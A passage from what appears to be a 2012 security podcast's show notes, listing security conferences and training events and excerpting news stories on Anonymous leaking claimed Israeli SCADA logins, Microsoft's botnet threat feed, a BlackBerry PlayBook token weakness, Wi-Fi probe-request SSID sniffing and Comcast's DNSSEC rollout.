	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacktivist group Anonymous has released what it claims to be a series of log-in details for Israeli SCADA systems, in what could be retaliation for Tel Aviv&#39;s hardline reaction to the recent mass credit card hack on thousands of its citizens.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new @FuryOrAnon account, which has been vouched for by one of the group&#39;s most prominent Tweeters, @AnonymouSabu, posted a link to the Pastebin page on Twitter on Wednesday.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Who wanna have some fun with israeli scada systems&#8230;&quot; noted the tweet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Pastebin page in question contains what it claims to be a list of ten IP addresses for Israeli SCADA systems as well as log-in details.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The timing of the release of these details comes just a couple of days after Israeli deputy foreign minister Danny Ayalon likened those who recently hacked the bank accounts of thousands of Israeli citizens to terrorists.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Israel has active capabilities for striking at those who are trying to harm it and no agency or hacker will be immune from retaliatory action,&quot; he&#39;s reported to have said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Maintaining the pressure on the country&#39;s leaders, @anonymouSabu published a series of tweets on Thursday with the #fuckisrael hashtag.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://threatpost.com/en_us/blogs/microsoft-readying-real-time-hosted-threat-intelligence-feed-011112"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/microsoft-readying-real-time-hosted-threat-intelligence-feed-011112</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has proven that it can take down huge, global botnets like Kelihos, Rustock and Waldec. Now the company is ready to start making the data it acquires in those busts available to governments, law enforcement and customers as a real time threat intelligence feed.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Representatives from the Redmond, Washington software maker told an audience at the International Conference on Cyber Security (ICCS) here that it was testing a new service to distribute threat data from captured botnets and other sources to partners, including foreign governments, Computer Emergency Response Teams (CERTs) and private corporations.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We collect a tremendous amount of data from our global assets,&quot; said T.J. Campana, a Senior Program Manager in Microsoft Digital Crimes Unit (DCU). Now the company is now working on a way to get slices of that information to its partners, including ISPs, CERTs, government agencies and private companies, based on their need, he said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft is beta testing the system internally in recent months. &nbsp;Campana described it as a 70-node cluster running the Apache Hadoop framework on top of Windows Server. It currently stores data culled from the Kelihos botnet in September, 2011 and other sources.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data includes IP addresses of Kelihos infected systems complemented by other data such as the AS (autonomous system) number and reputation data provided by Microsoft&#39;s Smart Data Network Services (SNDS). Personally identifiable informaiton (PII) would not be part of the threat feed, Campana said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft collects the data by leveraging its huge Internet infrastructure, including a load-balanced, 80gb/second global network, to swallow botnets whole &#8211; pointing botnet infected hosts to addresses that Microsoft controls, capturing their activity and effectively taking them offline.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://threatpost.com/en_us/blogs/researchers-find-way-sniff-corporate-email-blackberry-playbook-011212"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/researchers-find-way-sniff-corporate-email-blackberry-playbook-011212</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers and attackers have had no shortage of mobile platforms and devices to sink their teeth into in recent years, thanks to the explosion of iOS and Android phones and tablets in the consumer and enterprise markets. Now, the spotlight is slowly beginning to turn in the direction of RIM, and specifically its BlackBerry PlayBook tablet.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first dings in the PlayBook&#39;s armor came last month when a group of researchers published a tool that could jailbreak PlayBook tablets through the exploitation of a bug they&#39;d discovered in the operating system. RIM later issued a fix for the jailbreak, but that was just the start of what may end up being a long road for the company&#39;s security efforts.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest indication is work done by a pair of researchers who found a series of problems and weaknesses in PlayBook, including one that enables an attacker to listen in on the connection between the tablet and a BlackBerry handset. That connection, which is done via Bluetooth in the company&#39;s Bridge application, is designed to allow users to access their corporate email, calendar and other data on the tablet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers Zach Lanier and Ben Nell of Intrepidus Group were able to locate and grab the authentication token sent between the two devices during Bridge connections and, as an unprivileged user, connect to the PlayBook and access the user&#39;s email and other sensitive information. The key to their finding, which they discussed in a talk at the Infiltrate conference here Thursday, is the fact that the PlayBook&#39;s OS puts the authentication token for the Bridge sessions in a spot that is readable by anyone who knows how to find it.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/</span></a></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All devices have Wi-Fi interfaces (laptops, tablets, mobile phones, consoles, etc) and their operating systems have features to easily manage the wireless networks you connect them to. When you connect for a first time to a new network, most users save the informations for later use (or the system stores it for you without notification). This small database will be used later by the operating system to discover which known network(s) is(are) available and automatically connect to them.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This database may contains a lot of interesting data. Some may reveal private information like your employer, your ISP, where you go to party, to eat, where you go on holidays or which security conference you attended. Why? Simply because networks are often configured with explicit names</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">By default, when a new wireless network is configured, the flag &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto-connect</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; is enabled. This is the case on Ubuntu, MacOS and Windows 7. What does this mean? Each time you boot your computer or you reconfigure your Wireless card, the device will sent &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Request</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; management frame over the air. This can be compared to a message like &ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hey! Network xxx are you there?</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;. Even if your network uses encryption, all those probes are sent in clear! In Wi-Fi technologies, they are several methods available to detect the available networks or SSIDs:</span></div>
<ul>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Beacon,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Requests,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Responses,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Association Requests,</span></li>
<li style="list-style-type:disc;font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reassociation Requests</span></li>
</ul>
<p>
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Probe Requests</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; are very interesting to be captured to detect the SSID&rsquo;s already configured and used by people. To achieve this, we just need a</span><a href="http://www.backtrack-linux.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> BackTrack 5</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a Wi-Fi network card that supports</span><a href="http://blog.rootshell.be/2010/08/09/backtrack4-r1-awus036nh-win/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">monitoring</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> mode and some tools.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The script is available</span><a href="https://github.com/xme/hoover"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;..</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://venturebeat.com/2012/01/12/comcast-sopa/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://venturebeat.com/2012/01/12/comcast-sopa/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cable TV and internet service provider Comcast recently rolled out an upgrade to its entire internet service network that prevents DNS blocking. DNS blocking would be necessary to enforce the Stop Online Piracy Act (SOPA) should it pass.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The</span><a href="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DNSSEC</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> technology Comcast has implemented across its network is intended to add an extra layer of security to websites by checking for a special DNS signature to prove that the site is actually what it claims to be, according to a</span><a href="http://www.techdirt.com/articles/20120110/18081517371/comcast-owner-nbc-universal-admits-that-dns-redirects-are-incompatible-with-dnssec.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">TechDirt</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> report.</span></div>
<p>&nbsp;</p>
